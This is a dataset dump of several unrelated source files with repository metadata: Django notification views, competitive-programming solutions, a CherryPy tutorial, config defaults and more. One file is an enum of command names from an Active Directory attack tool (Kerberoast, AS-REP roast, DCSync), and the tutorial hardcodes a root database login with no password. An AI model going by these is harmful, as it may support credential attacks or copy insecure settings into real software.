job_ids = [job.args[0] for job, _ in jobs]
# Build a dict of the user's message data matching those Jobs.
message_data = defaultdict(dict)
for msg in user.gcmmessage_set.filter(pk__in=job_ids):
message_data[msg.id] = {
'id': msg.id,
'title': msg.title,
'user_id': msg.user_id,
'email': msg.user.email,
'message': msg.message,
'title': msg.title,
'date_string': msg.deliver_on.strftime("%Y-%m-%d"),
'queue_id': msg.queue_id,
}
# Restrict the list of jobs to those intended for the given user.
jobs = [
(job, scheduled_for, message_data[job.args[0]])
for job, scheduled_for in jobs if job.args[0] in message_data
]
else:
jobs = []
context = {
'devices': devices,
'email': email,
'num_jobs': queue.get_scheduler().count(),
'jobs': jobs,
'metrics': ['GCM Message Sent', 'GCM Message Scheduled'],
'selected_date': date,
'selected_user': user,
'user_queues': user_queues,
}
return render(request, "notifications/index.html", context)
@user_passes_test(lambda u: u.is_staff, login_url='/')
def userqueue(request, user_id, date):
"""Return UserQueue details; i.e. the sheduled notifications/jobs for the
user for a given date.
"""
user = get_object_or_404(get_user_model(), pk=user_id)
date = datetime.strptime(date, '%Y-%m-%d')
data = queue.UserQueue.get_data(user, date)
# massage that data a bit.
results = {}
for key, values in data.items():
if 'count' in key:
results['count'] = values
elif 'low' in key:
results['low'] = values
elif 'medium' in key:
results['medium'] = values
elif 'high' in key:
results['high'] = values
results['date'] = date.strftime("%Y-%m-%d")
results['user'] = user.get_full_name()
return JsonResponse(results)
@user_passes_test(lambda u: u.is_staff, login_url='/')
def cancel_job(request):
"""Look for an enqueued job with the given ID and cancel it."""
job_id = request.POST.get('job_id', None)
if request.method == "POST" and job_id:
for job, _ in queue.messages():
if job.id == job_id:
job.cancel()
messages.success(request, "That notification has been cancelled")
break
return redirect("notifications:dashboard")
@user_passes_test(lambda u: u.is_staff, login_url='/')
def cancel_all_jobs(request):
"""Cancels queued messages."""
count = 0
if request.method == "POST" and request.POST.get('orphaned') == 'on':
# Sometimes we end up with orphaned jobs (e.g. a user is deleted, but
# GCMMessage's delete signal handler doesn't fire).
queue_ids = list(GCMMessage.objects.values_list('queue_id', flat=True))
jobs = [job for job, _ in queue.messages() if job.id not in queue_ids]
for job in jobs:
job.cancel()
count += 1
elif request.method == "POST":
for job, _ in queue.messages():
job.cancel()
count += 1
messages.success(request, "Cancelled {} notifications.".format(count))
return redirect("notifications:dashboard")
| [
"brad@bradmontgomery.net"
] | brad@bradmontgomery.net |
8b225ee618d2c0e039ce2c2d41cf4951ba7b6028 | c1c5a8dc79cacf3b419bad77881213c5db2f80c3 | /Kattis/Hangman.py | 540add223680299e4c243eee7ae10b1621c955f5 | [] | no_license | EoinDavey/Competitive | 7ff8b6b6225814ac60c3ace659bb63190eb52420 | b2b6909b93f5c073b684477f8a4b06dac22ec678 | refs/heads/master | 2023-01-08T00:06:19.076941 | 2022-12-26T14:00:31 | 2022-12-26T14:00:31 | 67,259,478 | 17 | 1 | null | 2022-01-19T18:17:59 | 2016-09-02T22:46:26 | C++ | UTF-8 | Python | false | false | 189 | py | w = set(raw_input())
r = set()
s = raw_input()
i = 0
for c in s:
if c in w:
r.add(c)
else:
i+=1
if len(r) == len(w):
break
if i < 10:
print "WIN"
else:
print "LOSE"
| [
"eoind@vey.ie"
] | eoind@vey.ie |
d03b9dea06bfefc925406420ce6441c7af6a6826 | 3da69696601b2b3ad7bc1285a5f0343c7eafea80 | /lc417.py | 4fde0896c49f578ad3744a0571ca5a994537d5c7 | [] | no_license | GeorgyZhou/Leetcode-Problem | ee586463a2e4e75c910c095bdc057f1be70b5c1b | d6fac85a94a7188e93d4e202e67b6485562d12bd | refs/heads/master | 2021-06-30T15:58:04.698200 | 2020-12-18T22:55:49 | 2020-12-18T22:55:49 | 66,054,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,106 | py | class Solution(object):
def pacificAtlantic(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[List[int]]
"""
import heapq
row = len(matrix)
if row == 0:
return []
col = len(matrix[0])
if col == 0:
return []
ret = []
pac = dict()
alt = dict()
heapalt = []
heappac = []
pacvisited = dict()
altvisited = dict()
for i in xrange(row):
pac[(i,0)] = 1
pacvisited[(i,0)] = 1
alt[(i,col-1)] = 1
altvisited[(i, col-1)] = 1
heapq.heappush(heapalt, (matrix[i][col-1], i, col-1))
heapq.heappush(heappac, (matrix[i][0], i, 0))
for j in xrange(1, col):
pac[(0,j)] = 1
pacvisited[(0, j)] = 1
alt[(row-1, col-1-j)] = 1
altvisited[(row-1, col-1-j)] = 1
heapq.heappush(heappac, (matrix[0][j], 0, j))
heapq.heappush(heapalt, (matrix[row-1][col-1-j], row-1, col-1-j))
while len(heappac) > 0:
height, i, j = heapq.heappop(heappac)
for x, y in [(i-1, j), (i+1, j), (i, j-1), (i, j+1)]:
if 0 <= x < row and 0<= y < col and not pacvisited.has_key((x, y)) and height <= matrix[x][y]:
pac[(x,y)] = 1
heapq.heappush(heappac, (matrix[x][y], x, y))
pacvisited[(x,y)] = 1
while len(heapalt) > 0:
height, i, j = heapq.heappop(heapalt)
for x, y in [(i-1, j), (i+1, j), (i, j-1), (i, j+1)]:
if 0 <= x < row and 0<= y < col and not altvisited.has_key((x, y)) and height <= matrix[x][y]:
alt[(x,y)] = 1
heapq.heappush(heapalt, (matrix[x][y], x, y))
altvisited[(x,y)] = 1
for x in xrange(row):
for y in xrange(col):
if alt.has_key((x, y)) and pac.has_key((x, y)):
ret.append([x, y])
return ret
| [
"michaelchouqj@gmail.com"
] | michaelchouqj@gmail.com |
cf9536970a1d384e5d71709808001cf25fb90dc5 | 39e1e256acae3fe9be4434024d42b9bb47bdd02f | /analysis/submissions/844088c7077d499fa3533250ae504e7f_task2-2_1595958872/task2-2/main_patch.py | 9487fafad846fe1eb836cae4a61d574d42fae035 | [] | no_license | neulab/tranx-study | 9fb67b9a2181f0b362e4f97316c502eee4539b19 | e2a7089689f7f95e773e19c8f19513abe4fb8b9b | refs/heads/master | 2023-06-14T04:46:01.010892 | 2021-07-08T09:29:05 | 2021-07-08T09:29:05 | 250,357,553 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 584 | py | from os import listdir
from os.path import isfile, join
from shutil import copyfile
def clean(file):
with open(file, 'r', encoding="ISO-8859-1") as f:
print(file)
return '\n'.join([line for line in f.read().strip().splitlines()]).encode('utf-8')
for fname in listdir('data/'):
fpath = join('data/', fname)
if isfile(fpath):
output_path = join('output/', fname)
if fpath.endswith('.txt'):
with open(output_path, 'wb') as out_f:
out_f.write(clean(fpath))
else:
copyfile(fpath, output_path)
| [
"frankxu2004@gmail.com"
] | frankxu2004@gmail.com |
4814556209a63b3749122e9e8c239c4aabab5d69 | 75402b6c851a12ae41359fdd83e89d2160c308af | /zentral/contrib/mdm/views/base.py | e87ecd36b7d41addde0cb28c75645741a6dd1b1d | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-commercial-license"
] | permissive | neocode12/zentral | 7b05aeeb823a5a3d7d268cc2b01e0bf1a5e4be71 | 9ecc8d8334148627fcccaa875f100adacd7a018b | refs/heads/main | 2023-04-09T12:06:45.355559 | 2023-03-15T14:05:05 | 2023-03-15T14:05:05 | 327,651,549 | 0 | 0 | Apache-2.0 | 2021-01-07T15:30:00 | 2021-01-07T15:30:00 | null | UTF-8 | Python | false | false | 1,481 | py | from django.core.exceptions import SuspiciousOperation
from zentral.utils.http import user_agent_and_ip_address_from_request
class PostEventMixin:
_setup_done = False
def dispatch(self, request, *args, **kwargs):
self.setup_with_request(request)
return super().dispatch(request, *args, **kwargs)
def setup_with_request(self, request):
if not self._setup_done:
self.user_agent, self.ip = user_agent_and_ip_address_from_request(request)
self.serial_number = self.udid = None
self.realm_user = None
self._setup_done = True
def post_event(self, status, **event_payload):
event_payload["status"] = status
if self.udid:
event_payload["udid"] = self.udid
if self.realm_user:
realm = self.realm_user.realm
event_payload["realm"] = {"pk": str(realm.pk),
"name": realm.name}
event_payload["realm_user"] = {"pk": str(self.realm_user.pk),
"username": self.realm_user.username}
self.event_class.post_machine_request_payloads(self.serial_number, self.user_agent, self.ip,
[event_payload])
def abort(self, reason, **event_payload):
if reason:
event_payload["reason"] = reason
self.post_event("failure", **event_payload)
raise SuspiciousOperation
| [
"eric.falconnier@112hz.com"
] | eric.falconnier@112hz.com |
57b0f77bec4f7eec3adf821f20ae402b5af51d66 | 2ff7e53d5e512cd762217ca54317982e07a2bb0c | /eve-8.51.857815/carbon/common/lib/cherrypy/tutorial/bonus-sqlobject.py | 28b698ecccf4841092d2c84d53dee0097cbcc5cf | [] | no_license | nanxijw/Clara-Pretty-One-Dick | 66d3d69426642b79e8fd4cc8e0bec23adeeca6d6 | 50de3488a2140343c364efc2615cf6e67f152be0 | refs/heads/master | 2021-01-19T09:25:07.555284 | 2015-02-17T21:49:33 | 2015-02-17T21:49:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,502 | py | #Embedded file name: carbon/common/lib/cherrypy/tutorial\bonus-sqlobject.py
"""
Bonus Tutorial: Using SQLObject
This is a silly little contacts manager application intended to
demonstrate how to use SQLObject from within a CherryPy2 project. It
also shows how to use inline Cheetah templates.
SQLObject is an Object/Relational Mapper that allows you to access
data stored in an RDBMS in a pythonic fashion. You create data objects
as Python classes and let SQLObject take care of all the nasty details.
This code depends on the latest development version (0.6+) of SQLObject.
You can get it from the SQLObject Subversion server. You can find all
necessary information at <http://www.sqlobject.org>. This code will NOT
work with the 0.5.x version advertised on their website!
This code also depends on a recent version of Cheetah. You can find
Cheetah at <http://www.cheetahtemplate.org>.
After starting this application for the first time, you will need to
access the /reset URI in order to create the database table and some
sample data. Accessing /reset again will drop and re-create the table,
so you may want to be careful. :-)
This application isn't supposed to be fool-proof, it's not even supposed
to be very GOOD. Play around with it some, browse the source code, smile.
:)
-- Hendrik Mans <hendrik@mans.de>
"""
import cherrypy
from Cheetah.Template import Template
from sqlobject import *
__connection__ = 'mysql://root:@localhost/test'
class Contact(SQLObject):
lastName = StringCol(length=50, notNone=True)
firstName = StringCol(length=50, notNone=True)
phone = StringCol(length=30, notNone=True, default='')
email = StringCol(length=30, notNone=True, default='')
url = StringCol(length=100, notNone=True, default='')
class ContactManager:
def index(self):
contacts = Contact.select()
template = Template('\n <h2>All Contacts</h2>\n\n #for $contact in $contacts\n <a href="mailto:$contact.email">$contact.lastName, $contact.firstName</a>\n [<a href="./edit?id=$contact.id">Edit</a>]\n [<a href="./delete?id=$contact.id">Delete</a>]\n <br/>\n #end for\n\n <p>[<a href="./edit">Add new contact</a>]</p>\n ', [locals(), globals()])
return template.respond()
index.exposed = True
def edit(self, id = 0):
id = int(id)
if id > 0:
contact = Contact.get(id)
title = 'Edit Contact'
else:
contact = None
title = 'New Contact'
template = Template('\n <h2>$title</h2>\n\n <form action="./store" method="POST">\n <input type="hidden" name="id" value="$id" />\n Last Name: <input name="lastName" value="$getVar(\'contact.lastName\', \'\')" /><br/>\n First Name: <input name="firstName" value="$getVar(\'contact.firstName\', \'\')" /><br/>\n Phone: <input name="phone" value="$getVar(\'contact.phone\', \'\')" /><br/>\n Email: <input name="email" value="$getVar(\'contact.email\', \'\')" /><br/>\n URL: <input name="url" value="$getVar(\'contact.url\', \'\')" /><br/>\n <input type="submit" value="Store" />\n </form>\n ', [locals(), globals()])
return template.respond()
edit.exposed = True
def delete(self, id):
contact = Contact.get(int(id))
contact.destroySelf()
return 'Deleted. <a href="./">Return to Index</a>'
delete.exposed = True
def store(self, lastName, firstName, phone, email, url, id = None):
if id and int(id) > 0:
contact = Contact.get(int(id))
contact.set(lastName=lastName, firstName=firstName, phone=phone, email=email, url=url)
else:
contact = Contact(lastName=lastName, firstName=firstName, phone=phone, email=email, url=url)
return 'Stored. <a href="./">Return to Index</a>'
store.exposed = True
def reset(self):
Contact.dropTable(True)
Contact.createTable()
Contact(firstName='Hendrik', lastName='Mans', email='hendrik@mans.de', phone='++49 89 12345678', url='http://www.mornography.de')
return 'reset completed!'
reset.exposed = True
print "If you're running this application for the first time, please go to http://localhost:8080/reset once in order to create the database!"
cherrypy.quickstart(ContactManager())
| [
"billchang.e@gmail.com"
] | billchang.e@gmail.com |
7be5c1610311e38a44408af45228a5092697cb36 | 9e765b38a03c2996e221a42c2a0dbc0fe02824cb | /general_interview_qs/serialize_deserialize_binary_tree/binary_search_tree.py | 7d69deb9bc0240ce5a5c30d0940e79d08821b1f2 | [
"Apache-2.0"
] | permissive | angelusualle/algorithms | f709b4ae0c3275cece204d5fb56fd6ec34b4683b | 86286a49db2a755bc57330cb455bcbd8241ea6be | refs/heads/main | 2023-07-02T19:25:11.720114 | 2021-08-12T16:33:00 | 2021-08-12T16:33:00 | 269,791,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | import json
class Node():
def __init__(self, value):
self.value = value
self.left_child = None
self.right_child = None
def serialize_bst(root):
return json.dumps(serialize_bst_recursive(root))
def serialize_bst_recursive(root):
return root and (root.value, serialize_bst_recursive(root.left_child), serialize_bst_recursive(root.right_child))
def deserialize_bst(data):
return deserialize_bst_recursive(json.loads(data))
def deserialize_bst_recursive(data):
if data:
root = Node(data[0])
root.left_child = deserialize_bst_recursive(data[1])
root.right_child = deserialize_bst_recursive(data[2])
return root | [
"angelusualle@gmail.com"
] | angelusualle@gmail.com |
3cce911205ad7d207806b4df38a18d5029619084 | 9b20743ec6cd28d749a4323dcbadb1a0cffb281b | /11_Time_Series_Forecasting_with_Python/08/random_walk_persistence.py | 0a9ec3767d6c6e19c7e37f6146090e3366394702 | [] | no_license | jggrimesdc-zz/MachineLearningExercises | 6e1c7e1f95399e69bba95cdfe17c4f8d8c90d178 | ee265f1c6029c91daff172b3e7c1a96177646bc5 | refs/heads/master | 2023-03-07T19:30:26.691659 | 2021-02-19T08:00:49 | 2021-02-19T08:00:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # persistence forecasts for a random walk
from math import sqrt
from random import random
from random import seed
from sklearn.metrics import mean_squared_error
# generate the random walk
seed(1)
random_walk = list()
random_walk.append(-1 if random() < 0.5 else 1)
for i in range(1, 1000):
movement = -1 if random() < 0.5 else 1
value = random_walk[i - 1] + movement
random_walk.append(value)
# prepare dataset
train_size = int(len(random_walk) * 0.66)
train, test = random_walk[0:train_size], random_walk[train_size:]
# persistence
predictions = list()
history = train[-1]
for i in range(len(test)):
yhat = history
predictions.append(yhat)
history = test[i]
rmse = sqrt(mean_squared_error(test, predictions))
print('Persistence RMSE: %.3f' % rmse)
| [
"jgrimes@jgrimes.tech"
] | jgrimes@jgrimes.tech |
32a2d37244020f9f94575b7edd8b299c75941baa | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03131/s755210567.py | 2089454a42165092751754963ddeb69a197d66c8 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | K, A, B = map(int, input().split())
if B - A <= 2:
print(K + 1)
else:
ans = 0
# 初回のA枚→B枚まで A-1 回かかる
rest = K - A + 1
# このときにはA枚持っている
ans += A
# 残りをすべてA枚→B枚
ans += rest // 2 * (B - A)
if rest % 2 != 0:
ans += 1
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
7379d7c195155642ce162043732d4f0040240093 | 3ad8887aca54daa74b1fe446cb35cd0902e1e9bd | /jackdaw/nest/ws/protocol/cmdtypes.py | dcd8aaa5c412c3cc29a7fc3200dcf7f1c5990f79 | [] | no_license | huangzccn/jackdaw | 6ea5f3f7901c1c64b469ea4c25de0e77a3fc49a2 | 1a9800152fb8f19d5db43fcd235f45f6db2e3878 | refs/heads/master | 2023-08-29T11:44:46.692776 | 2021-10-23T20:00:36 | 2021-10-23T20:00:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,745 | py | import enum
class NestOpCmd(enum.Enum):
GATHER = 'GATHER'
KERBEROAST = 'KERBEROAST'
KERBEROASTRES = 'KERBEROASTRES'
ASREPROAST = 'ASREPROAST'
ASREPROASTRES = 'ASREPROASTRES'
KERBEROSTGS = 'KERBEROSTGS'
KERBEROSTGSRES = 'KERBEROSTGSRES'
KERBEROSTGT = 'KERBEROSTGT'
KERBEROSTGTRES = 'KERBEROSTGTRES'
SMBSESSIONS = 'SMBSESSIONS'
SMBFILES = 'SMBFILES'
SMBDCSYNC = 'SMBDCSYNC'
PATHSHORTEST = 'PATHSHORTEST'
PATHDA = 'PATHDA'
GETOBJINFO = 'GETOBJINFO'
CHANGEAD = 'CHANGEAD'
LISTADS = 'LISTADS'
LISTADSRES = 'LISTADSRES'
OK = 'OK'
ERR = 'ERR'
LOG = 'LOG'
CANCEL = 'CANCEL'
TCPSCAN = 'TCPSCAN'
TCPSCANRES = 'TCPSCANRES'
PATHRES = 'PATHRES'
GATHERSTATUS = 'GATHERSTATUS'
USERRES = 'USERRES'
COMPUTERRES = 'COMPUTERRES'
SMBSESSIONRES = 'SMBSESSIONRES'
SMBSHARERES = 'SMBSHARERES'
SMBLOCALGROUPRES = 'SMBLOCALGROUPRES'
LOADAD = 'LOADAD'
GROUPRES = 'GROUPRES'
EDGERES = 'EDGERES'
EDGEBUFFRES = 'EDGEBUFFRES'
USERBUFFRES = 'USERBUFFRES'
GROUPBUFFRES = 'GROUPBUFFRES'
COMPUTERBUFFRES = 'COMPUTERBUFFRES'
SMBSHAREBUFFRES = 'SMBSHAREBUFFRES'
SMBFILERES = 'SMBFILERES'
ADDCRED = 'ADDCRED'
LISTCRED = 'LISTCRED'
GETCRED = 'GETCRED'
CREDRES = 'CREDRES'
ADDTARGET = 'ADDTARGET'
LISTTARGET = 'LISTTARGET'
GETTARGET = 'GETTARGET'
TARGETRES = 'TARGETRES'
LISTGRAPHS = 'LISTGRAPHS'
CHANGEGRAPH = 'CHANGEGRAPH'
LOADGRAPH = 'LOADGRAPH'
LISTGRAPHRES = 'LISTGRAPHRES'
LISTAGENTS = 'LISTAGENTS'
AGENT = 'AGENT'
OBJOWNED = 'OBJOWNED'
OBJHVT = 'OBJHVT'
WSNETROUTERCONNECT = 'WSNETROUTERCONNECT'
WSNETROUTERDISCONNECT = 'WSNETROUTERDISCONNECT'
NOTIFY = 'NOTIFY'
WSNETROUTER = 'WSNETROUTER'
WSNETLISTROUTERS = 'WSNETLISTROUTERS'
PATHKERB = 'PATHKERB'
PATHASREP = 'PATHASREP'
PATHOWNED = 'PATHOWNED' | [
"info@skelsec.com"
] | info@skelsec.com |
463916eb7f9d2c84f8495c3cd2cf86f69b7f2b47 | b0d0e585c82b29aaabcb141f9f54280559abac69 | /Datastructures/spiral.py | 2b6df640797337c222abd54d3fabf6c6e852253b | [] | no_license | prem1806/python-practice-files | 32a6eb7236a9779dec0fb75d3792c34533e6491c | 3f152e4b62fb7f81e5113dced06b4dc7cce4b440 | refs/heads/master | 2021-05-29T16:59:00.349844 | 2015-10-06T17:58:56 | 2015-10-06T17:58:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 866 | py | def auto(A):
m = len(A)
n = len(A[0])
T = 0
B = m - 1
L = 0
R = n - 1
direction = 0
ret = []
while T <= B and L <= R:
if (direction == 0):
for i in range(L,R+1):
ret.append(A[T][i])
T += 1
direction = 1
elif direction == 1:
for i in range(T,B+1):
ret.append(A[i][R])
R -= 1
direction = 2
elif direction == 2:
for i in range(R, L - 1, -1):
ret.append(A[B][i])
B -= 1
direction = 3
else:
for i in range(B,T-1, -1):
ret.append(A[i][L])
L += 1
direction = 0
return ret
A = [[1,2,3,4,5],[9,5,3,6,6,9,3],[1,5,3,8,6,4,2]]
print auto(A)
| [
"rohith.uppala369@gmail.com"
] | rohith.uppala369@gmail.com |
d4ed1afb2f18e5872a87afc51949c67782c4d55e | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_cams.py | 79899c97da6b6f7a5750ef111987199a2e5323fe | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py |
from xai.brain.wordbase.nouns._cam import _CAM
#calss header
class _CAMS(_CAM, ):
def __init__(self,):
_CAM.__init__(self)
self.name = "CAMS"
self.specie = 'nouns'
self.basic = "cam"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
d8b1f1388e4a768f0006ce3f1ac5e57574bc519b | ce76b3ef70b885d7c354b6ddb8447d111548e0f1 | /time_or_world/see_long_case_under_year/early_day_or_hand.py | e5672fa966bf5cb831f37a71568f7efcaca277b6 | [] | no_license | JingkaiTang/github-play | 9bdca4115eee94a7b5e4ae9d3d6052514729ff21 | 51b550425a91a97480714fe9bc63cb5112f6f729 | refs/heads/master | 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | py |
#! /usr/bin/env python
def early_fact(str_arg):
place_and_young_government(str_arg)
print('other_problem')
def place_and_young_government(str_arg):
print(str_arg)
if __name__ == '__main__':
early_fact('great_man_or_man')
| [
"jingkaitang@gmail.com"
] | jingkaitang@gmail.com |
e5f64d8df89dd8374d572ba638269fb1af708fd3 | c9e0227c3958db89747488328bd2b255e54f008f | /solutions/0748. Shortest Completing Word/0748.py | a4b585f171fb2752d25e76439753fa102ae11038 | [] | no_license | XkhldY/LeetCode | 2deba28b7491c36b4f224c3132fb89feea318832 | 94e23db2668615d9fe09e129a96c22ae4e83b9c8 | refs/heads/main | 2023-04-03T08:17:30.743071 | 2021-04-14T23:34:03 | 2021-04-14T23:34:03 | 358,136,537 | 1 | 0 | null | 2021-04-15T05:20:21 | 2021-04-15T05:20:21 | null | UTF-8 | Python | false | false | 492 | py | class Solution:
def shortestCompletingWord(self, licensePlate: str, words: List[str]) -> str:
def isMatch(word: str) -> bool:
wordCount = Counter(word)
return False if any(wordCount[i] < count[i] for i in string.ascii_letters) else True
ans = '*' * 16
count = defaultdict(int)
for c in licensePlate:
if c.isalpha():
count[c.lower()] += 1
for word in words:
if len(word) < len(ans) and isMatch(word):
ans = word
return ans
| [
"walkccray@gmail.com"
] | walkccray@gmail.com |
9da8ce2b393a9e221c614b46da6993a8350023c7 | 2b0eab74af8d23244ff11699830f9bb10fbd717a | /visit_report/migrations/0051_remove_cite_steps.py | 76dc57044caf2e095a4415fa7a366948cb1549e3 | [] | no_license | alexandrenorman/mixeur | c7e25cd20b03c78b361cb40e3e359a6dc5d9b06b | 95d21cd6036a99c5f399b700a5426e9e2e17e878 | refs/heads/main | 2023-03-13T23:50:11.800627 | 2021-03-07T15:49:15 | 2021-03-07T15:49:15 | 345,384,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | from django.db import migrations
def remove_cite_steps(apps, schema_editor):
Steps = apps.get_model('visit_report', 'Step')
Steps.objects.filter(category="financing", milestone="work-end", nature="cite").delete()
class Migration(migrations.Migration):
dependencies = [
('visit_report', '0050_add_prime_renov_step'),
]
operations = [
migrations.RunPython(remove_cite_steps),
]
| [
"norman@xael.org"
] | norman@xael.org |
0ef74428d763b21c1f13e563f623565510db01d0 | a3c662a5eda4e269a8c81c99e229879b946a76f6 | /.venv/lib/python3.7/site-packages/pylint/test/functional/star_needs_assignment_target_py35.py | 58e43dbacb50b64cee73eb2d348f19ea84d2a1ee | [
"MIT"
] | permissive | ahmadreza-smdi/ms-shop | 0c29da82c58b243507575672bbc94fb6e8068aeb | 65ba3f3061e2ac5c63115b08dadfe7d67f645fb6 | refs/heads/master | 2023-04-27T19:51:34.858182 | 2019-11-24T20:57:59 | 2019-11-24T20:57:59 | 223,616,552 | 6 | 2 | MIT | 2023-04-21T20:51:21 | 2019-11-23T16:09:03 | Python | UTF-8 | Python | false | false | 445 | py | """
Test PEP 0448 -- Additional Unpacking Generalizations
https://www.python.org/dev/peps/pep-0448/
"""
# pylint: disable=superfluous-parens
UNPACK_TUPLE = (*range(4), 4)
UNPACK_LIST = [*range(4), 4]
UNPACK_SET = {*range(4), 4}
UNPACK_DICT = {'a': 1, **{'b': '2'}}
UNPACK_DICT2 = {**UNPACK_DICT, "x": 1, "y": 2}
UNPACK_DICT3 = {**{'a': 1}, 'a': 2, **{'a': 3}}
UNPACK_IN_COMP = {elem for elem in (*range(10))} # [star-needs-assignment-target]
| [
"ahmadreza.smdi@gmail.com"
] | ahmadreza.smdi@gmail.com |
f2e355dfe0f62b71a7bc35dd20e268a5f7c5387a | 6ceeb3adb08da8754f59a117f39d401948988f0a | /spark/datadog_checks/spark/config_models/defaults.py | 30ebbb0df826f22f540c8c68a8b26011fb804c1b | [
"BSD-3-Clause",
"BSD-3-Clause-Modification",
"MIT",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"LGPL-2.1-only",
"LGPL-3.0-only",
"CC0-1.0",
"Unlicense",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Smartling/integrations-core | 794c3822f05c772c7e36fdde8b68c8c3284e71e3 | 79088364600aa8f06ec38500800f3803db77feed | refs/heads/master | 2023-04-15T14:21:50.017308 | 2023-04-11T20:13:26 | 2023-04-11T20:13:26 | 159,552,127 | 0 | 1 | BSD-3-Clause | 2023-04-07T16:38:06 | 2018-11-28T19:14:55 | Python | UTF-8 | Python | false | false | 4,552 | py | # (C) Datadog, Inc. 2021-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
# This file is autogenerated.
# To change this file you should edit assets/configuration/spec.yaml and then run the following commands:
# ddev -x validate config -s <INTEGRATION_NAME>
# ddev -x validate models -s <INTEGRATION_NAME>
from datadog_checks.base.utils.models.fields import get_default_field_value
def shared_proxy(field, value):
return get_default_field_value(field, value)
def shared_service(field, value):
return get_default_field_value(field, value)
def shared_skip_proxy(field, value):
return False
def shared_timeout(field, value):
return 10
def instance_allow_redirects(field, value):
return True
def instance_auth_token(field, value):
return get_default_field_value(field, value)
def instance_auth_type(field, value):
return 'basic'
def instance_aws_host(field, value):
return get_default_field_value(field, value)
def instance_aws_region(field, value):
return get_default_field_value(field, value)
def instance_aws_service(field, value):
return get_default_field_value(field, value)
def instance_connect_timeout(field, value):
return get_default_field_value(field, value)
def instance_disable_generic_tags(field, value):
return False
def instance_disable_legacy_cluster_tag(field, value):
return False
def instance_empty_default_hostname(field, value):
return False
def instance_enable_query_name_tag(field, value):
return False
def instance_executor_level_metrics(field, value):
return False
def instance_extra_headers(field, value):
return get_default_field_value(field, value)
def instance_headers(field, value):
return get_default_field_value(field, value)
def instance_kerberos_auth(field, value):
return 'disabled'
def instance_kerberos_cache(field, value):
return get_default_field_value(field, value)
def instance_kerberos_delegate(field, value):
return False
def instance_kerberos_force_initiate(field, value):
return False
def instance_kerberos_hostname(field, value):
return get_default_field_value(field, value)
def instance_kerberos_keytab(field, value):
return get_default_field_value(field, value)
def instance_kerberos_principal(field, value):
return get_default_field_value(field, value)
def instance_log_requests(field, value):
return False
def instance_metric_patterns(field, value):
return get_default_field_value(field, value)
def instance_metricsservlet_path(field, value):
return '/metrics/json'
def instance_min_collection_interval(field, value):
return 15
def instance_ntlm_domain(field, value):
return get_default_field_value(field, value)
def instance_password(field, value):
return get_default_field_value(field, value)
def instance_persist_connections(field, value):
return False
def instance_proxy(field, value):
return get_default_field_value(field, value)
def instance_read_timeout(field, value):
return get_default_field_value(field, value)
def instance_request_size(field, value):
return 16
def instance_service(field, value):
return get_default_field_value(field, value)
def instance_skip_proxy(field, value):
return False
def instance_spark_cluster_mode(field, value):
return 'spark_yarn_mode'
def instance_spark_pre_20_mode(field, value):
return False
def instance_spark_proxy_enabled(field, value):
return False
def instance_spark_ui_ports(field, value):
return get_default_field_value(field, value)
def instance_streaming_metrics(field, value):
return True
def instance_tags(field, value):
return get_default_field_value(field, value)
def instance_timeout(field, value):
return 10
def instance_tls_ca_cert(field, value):
return get_default_field_value(field, value)
def instance_tls_cert(field, value):
return get_default_field_value(field, value)
def instance_tls_ignore_warning(field, value):
return False
def instance_tls_private_key(field, value):
return get_default_field_value(field, value)
def instance_tls_protocols_allowed(field, value):
return get_default_field_value(field, value)
def instance_tls_use_host_header(field, value):
return False
def instance_tls_verify(field, value):
return True
def instance_use_legacy_auth_encoding(field, value):
return True
def instance_username(field, value):
return get_default_field_value(field, value)
| [
"noreply@github.com"
] | Smartling.noreply@github.com |
2f21c748d4601d3ee19276f8b0c2227ee5efcd28 | 88030f69f438cbeed773d144949c00859a447a52 | /tests/delimited_file_utils/test_delimited_file_utils.py | a0a223117aa766b4de1fbb2e21a722e85ac8d3d9 | [] | no_license | ryanGT/krauss_misc | 05f5845e9915e522cb595b165e81b580019969db | d693dfd19a42ba893a0200630a0f3435711666ee | refs/heads/main | 2022-09-27T22:57:06.738155 | 2022-09-02T14:51:13 | 2022-09-02T14:51:13 | 240,044 | 24 | 16 | null | null | null | null | UTF-8 | Python | false | false | 869 | py | import delimited_file_utils
import glob
from numpy import array
files = glob.glob('email_update_grades_test*.csv')
good_labels = array(['Group Name','Content/Progress','Clarity','Writing','Apparent Effort','Overall Grade','Notes'])
passes = []
failures = []
for curfile in files:
